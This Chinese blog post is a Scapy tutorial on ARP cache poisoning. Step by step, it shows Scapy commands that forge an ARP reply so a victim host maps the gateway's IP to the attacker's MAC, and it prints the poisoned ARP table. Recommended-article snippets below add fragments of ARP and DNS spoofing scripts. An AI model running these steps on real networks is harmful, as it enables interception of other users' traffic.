Python中的Scapy初探之三-ARP中毒

最新推荐文章于 2023-07-06 16:17:46 发布
最新推荐文章于 2023-07-06 16:17:46 发布
阅读量582 收藏
点赞数
分类专栏: python 文章标签: python 网络
原文地址:Python中的Scapy初探之三-ARP中毒作者:小牛牛

这个工具太强大,搞一个ARP缓存中毒竟然这么简单,关于ARP缓存中毒,可以百度。通过ARP缓存中毒,可以将目标计算机的IP地址与MAC地址对应关系替换成另外一台机器的MAC地址,这样,在链路层中,就会将发送到某个IP的数据发送到指定的机器上,例如,发送到192.168.1.1的数据,在ARP缓存中,找到192.168.1.1对应的MAC地址,然后通过链路层,将数据包传送到对应的机器上,如果将MAC替换成别的机器的MAC地址,那么数据也会传到那台机器上。而在Scapy中,这样替换非常简单。这样做太easy了

>>> p=ARP()
>>> p.show()
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= who-has
  hwsrc= 00:0c:29:3e:0f:da
  psrc= 192.168.1.104
  hwdst= 00:00:00:00:00:00
  pdst= 0.0.0.0

设置op=2,就是告知is-at

将hwsrc设置成数据的接收机的MAC地址,将psrc改成要替换的IP地址,pdst设置成要毒化的目标机器IP地址

例如,要毒化192.168.1.103上的ARP缓存,将网关192.168.1.1的对应关系改成192.168.1.104的MAC地址,就可以这么设置

p.psrc=’192.168.1.1’

p.pdst=’192.168.1.103’

>>> p.show()
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= is-at
  hwsrc= 00:0c:29:3e:0f:da
  psrc= 192.168.1.1
  hwdst= 00:00:00:00:00:00
  pdst= 192.168.1.103

然后发送

>>> send(p)

等待一会后,在192.168.1.103这台机器上看ARP缓存

[root@ipython ~]# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.100            ether   00:22:15:ca:59:2e   C                     eth0
192.168.1.104            ether   00:0c:29:3e:0f:da   C                     eth0
192.168.1.1              ether   00:0c:29:3e:0f:da   C                     eth0
发现已经被毒化了,特么的,造孽啊

Scapy创造了一个ARP数据包,将这个包设置为告知状态,然后设置好伪装的MAC地址与IP地址,发送给目标机器,这简直也太简单了吧

txyj08
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python黑帽子:利用scapy进行arp缓存投毒
samohyes的博客
08-05 2981
from scapy.all import * import os import sys import threading import signal #interface = 'en1' target_ip = '192.168.43.141' gateway_ip = '192.168.43.1' packet_count = 1000 def restore_target(gatewa
Python渗透测试之ARP毒化和协议应用
Liu_Bruce的博客
04-25 2311
Python渗透测试之ARP毒化和协议应用 1. ARP毒化 ​ ARP毒化是一种比较老的渗透测试技术,通过ARP毒化技术分析并提取内网流量的敏感信息,往往会有许多意外的收获。 1.1 工作原理 ARP(地址解析协议)是数据链路层的协议, 主要负责根据网络层地址(IP)来获取数据链路层地址(MAC)。以太网协议规定,同一局域网的一台主机要和另一台主机进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP网络只关注目标主机的IP地址,这就导致在以太网使用IP协议时,数据链路层的以太网协议接收
Python利用scapy实现ARP欺骗
热门推荐
shichimiyasatone的博客
03-27 1万+
一、实验原理。        本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送:eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意,参数为字符串类型 arp = ARP(hws...
pythonarp攻击_《python黑帽子》ARP缓存投毒python3写法(兼容Windows)
weixin_39957805的博客
11-23 205
1.先使用cmd进入scapy2.输入IFACES命令3.QQ截图20200717141058.png4.INDEX 13是我现在使用的网卡,代码为IFACES.dev_from_index(13) # 要嗅探的网卡# -*- coding:utf8 -*-from scapy.all import *import osimport sysimport threadingimport signa...
python scapy是什么_PythonScapy初探之四--DNS中毒
weixin_39776787的博客
12-08 227
今天做了ARP缓存中毒,又看到了DNS中毒,觉得比较新鲜。Scapy还真不是盖的简单来说,DNS中毒就是自己做一个应答的DNS包,发送给客户端,这样,客户端就中毒了,因为不管发出什么DNS请求解析,得到的都是伪装的DNS应答包,这样就什么都访问不了鸟,这个做起来也非常的简单Scapy里面有一个工具,就是专门做DNS中毒的,它就是dns_spoof(),这玩意非常好使,搞得我都上不了网了运行起来也很...
Python利用scapy实现ARP欺骗的方法
01-20
使用scapyscapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意,参数为字符串类型 arp = ARP(hwsrc=src_mac,...
Python库 | scapy_helper-0.5.2-py2.py3-none-any.whl
02-19
要安装`scapy_helper`,首先确保你的Python环境已经安装了Scapy。然后,你可以使用`pip`来安装`.whl`文件: ```bash pip install scapy_helper-0.5.2-py2.py3-none-any.whl ``` 安装完成后,就可以在你的Python...
Python使用scapy模拟数据包实现arp攻击、dns放大攻击例子
12-23
scapypython写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试。 这里就直接用pythonscapy搞。 这里是arp的攻击方式,你可以做成arp攻击。 复制...
Python库 | scapy_helper-0.1.9-py3-none-any.whl
04-26
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:scapy_helper-0.1.9-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
scapy-python3-0.14
12-11
在`scapy-python3-0.14`,你可以找到以下关键知识点: 1. **数据包构造与解析**:Scapy允许用户构建自定义的数据包,包括TCP、UDP、IP、ARP等众多协议层。它提供了类来表示各种协议,这些类可以被实例化并设置所...
python arp_PythonScapy初探之三-ARP中毒
weixin_39821874的博客
12-05 106
这个工具太强大,搞一个ARP缓存中毒竟然这么简单,关于ARP缓存中毒,可以百度。通过ARP缓存中毒,可以将目标计算机的IP地址与MAC地址对应关系替换成另外一台机器的MAC地址,这样,在链路层,就会将发送到某个IP的数据发送到指定的机器上,例如,发送到192.168.1.1的数据,在ARP缓存,找到192.168.1.1对应的MAC地址,然后通过链路层,将数据包传送到对应的机器上,如果将MAC...
ARP Cache Poisoning Attack Lab(SEED实验)
l4kjih3gfe2dcba1的博客
08-25 1780
ARP缓存区的污染真的很可怕呢。这次实验我们仅使用了ARP的请求报文来进行污染缓存,效果并不是很理想,A有时仍会收到B的请求而造成攻击短时性失效。如果task1的三种报文都被利用来进行污染的话,可以想象得到这种攻击将会万无一失。但与此同时,使用python进行MITM或许有可能是受限于虚拟机的效率,或在真实环境下的网络波动都会造成一定程度的延迟。受害者双方如果能够基于时延进行判断,或许能够一定程度减少攻击的成功概率;与此同时,攻击者也可以修改报文的时间戳,或通过镜像转发,实现自己的攻击目标。
scapy ARP
weixin_30770495的博客
05-04 208
scapy 常用命令 ls() //查看支持的协议对象lsc() //查看函数show() //查看数据包结构send() //三层发包sr() //三层收发sr1() //三层收发只收一 timeout指定超时 verbose指定详情sendp() //二层发包srp() //二层收发srp1() //二层收发只收一 timeout指定超时 verbose指定详情 为什...
一个基于arp扫描同网段存活ip和mac的python脚本
m0_73896875的博客
07-06 335
print(f'存活的ip地址是:{res[ARP].psrc} mac地址是:{res[ARP].hwsrc}')network_segment = int(input('请输入要扫描的网段:'))@File :arp扫描.py。@Author :星之尘。# 定义扫描ip函数。
Python 实现ARP扫描与欺骗
CSDN
10-07 7901
ARP欺骗又称ARP毒化或ARP攻击,是针对以太网地址解析协议ARP的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。网上其他人的一种实现方法,代码如下,只不过我们只做了ARP骗,而在该欺骗基础上可以加强为DNS欺骗。运用Scapy工具包,开发一款ARP扫描工具,扫描网段内所有的在线主机并显示其MAC地址。DNS欺骗需要一个DNS解析服务器,这里从网上找到一个DNS解析服务器代码,可以快速解析。
安全开发--3--Python实现ARP缓存投毒
武天旭的博客
07-25 516
ARP投毒的逻辑:欺骗目标设备,使其相信我们是它的网关;然后欺骗网关,告诉它要发给目标设备的所有流量必须交给我们转发。网络上的每一台设备,都维护着一段ARP缓存,里面记录着最近一段时间本地网络上的MAC地址和IP地址的对应关系。为了实现这一攻击,我们会往这些ARP缓存投毒,即在缓存插入我们编造的记录。另外,ARP投毒只对IPv4有效,对IPv6是无效的。
kali渗透之使用scapy定制数据包进行高级扫描
m0_56988395的博客
02-18 2273
目录 1,scapy定制ARP协议 2,scapy定制PING包 3,scapy定制TCP协议SYN请求 scapy是一个可以让用户发送,监听和解析并伪装网络报文的python程序,这些功能可以用于制作侦测,扫描和攻击网络的工具 1,scapy定制ARP协议 scapy进入,exit()退出 ARP().display() ###[ ARP ]### hwtype= 0x1 硬件类型 ptype= IPv4 协议类型 hwlen= 6 硬件地址长度(MAC) ple.
scapy实现arp 毒化攻击
ivnetware的博客
04-30 2671
攻击者IP    :192.168.0.112        MAC:00:0c:29:ab:27:ff 被攻击者IP:192.168.0.104        MAC:00:23:14:ad:36:c0 网关IP        :192.168.0.1             MAC:9c:21:6a:4f:cc:38  脚本a.py 欺骗 192.168.0.104主机告诉其网
python arp扫描_pythonarp扫描
weixin_42509833的博客
01-28 292
pythonarp扫描from optparse import *from scapy.all import *parser = OptionParser()parser.add_option("-p",action="store",dest="host",default=None,help="please imput a newwork")(options,args)=parser.parse...
pythonscapy
最新发布
01-19
Scapy是一个强大的Python库,用于网络数据包的创建、发送、捕获和分析。它可以用于网络协议开发、网络安全评估、网络故障排除等方面。 Scapy提供了一种简单而灵活的方式来构建和发送自定义的网络数据包。它支持构建各种类型的数据包,如TCP、UDP、ICMP等,并且可以自定义数据包的各个字段。通过Scapy,你可以轻松地创建和发送自定义的网络请求,以及对接收到的数据包进行解析和分析。 除了发送和接收数据包外,Scapy还提供了一些功能强大的工具,如网络扫描、ARP欺骗检测、流量生成等。它还支持对抓取到的数据包进行分析和处理,可以提取出数据包的各个字段,并进行进一步的处理和分析。 Scapy的优点之一是它的灵活性和可扩展性。你可以根据自己的需求编写自定义的协议或功能,并与Scapy进行集成。此外,Scapy还支持与其他Python库和工具进行集成,如Nmap、Wireshark等。 总结一下,Scapy是一个功能强大的Python库,用于网络数据包的创建、发送、捕获和分析。它提供了丰富的功能和灵活性,适用于各种网络编程和网络安全评估的场景。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值